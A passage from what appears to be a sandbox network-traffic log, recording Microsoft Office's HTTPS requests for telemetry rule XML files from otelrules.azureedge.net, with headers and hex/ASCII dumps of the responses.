                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              106192.168.2.46382713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:14 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1364
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                              x-ms-request-id: b98889fe-601e-0001-3b0a-2cfaeb000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061614Z-176bd8f9bc5nnctdhC1DFWuuh800000001vg000000007qg6
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              107192.168.2.46382913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:15 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1354
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                              x-ms-request-id: 8b140993-f01e-005d-3914-2c13ba000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061615Z-176bd8f9bc5qpx4shC1DFW30sn00000001gg000000006p9t
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              108192.168.2.46383013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:15 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                              x-ms-request-id: e852109a-801e-0048-1928-2cf3fb000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061615Z-176bd8f9bc5wl4brhC1DFWmstw00000001s0000000000r2d
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              109192.168.2.46383113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:15 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                              x-ms-request-id: 4551d574-201e-0000-465d-2ca537000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061615Z-r159446fcd7r47cfhC1DFW56w800000000vg000000007wu2
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              110192.168.2.46383213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:15 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                              x-ms-request-id: be879cea-801e-0035-5f09-2c752a000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061615Z-16ccfc49897rwhbvhC1DFWx88g00000001p0000000003v5c
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              111192.168.2.46383313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:15 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                              x-ms-request-id: a3e6dd77-301e-000c-6b09-2c323f000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061615Z-16dc884887bj94q5hC1DFW11e400000001f000000000dx7q
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:15 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              112192.168.2.46383413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:16 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                              x-ms-request-id: 418c3147-101e-008d-5609-2c92e5000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061616Z-16dc884887bssjjjhC1DFW2hb400000001eg000000009xxk
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              113192.168.2.46383713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:16 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                              x-ms-request-id: c6b20e60-701e-0050-230f-2c6767000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061616Z-176bd8f9bc5fngbjhC1DFWmqsc000000019g00000000b6s0
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              114192.168.2.46383513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:16 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                              x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061616Z-16ccfc49897b872mhC1DFWqtb000000001ng00000000b3wp
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
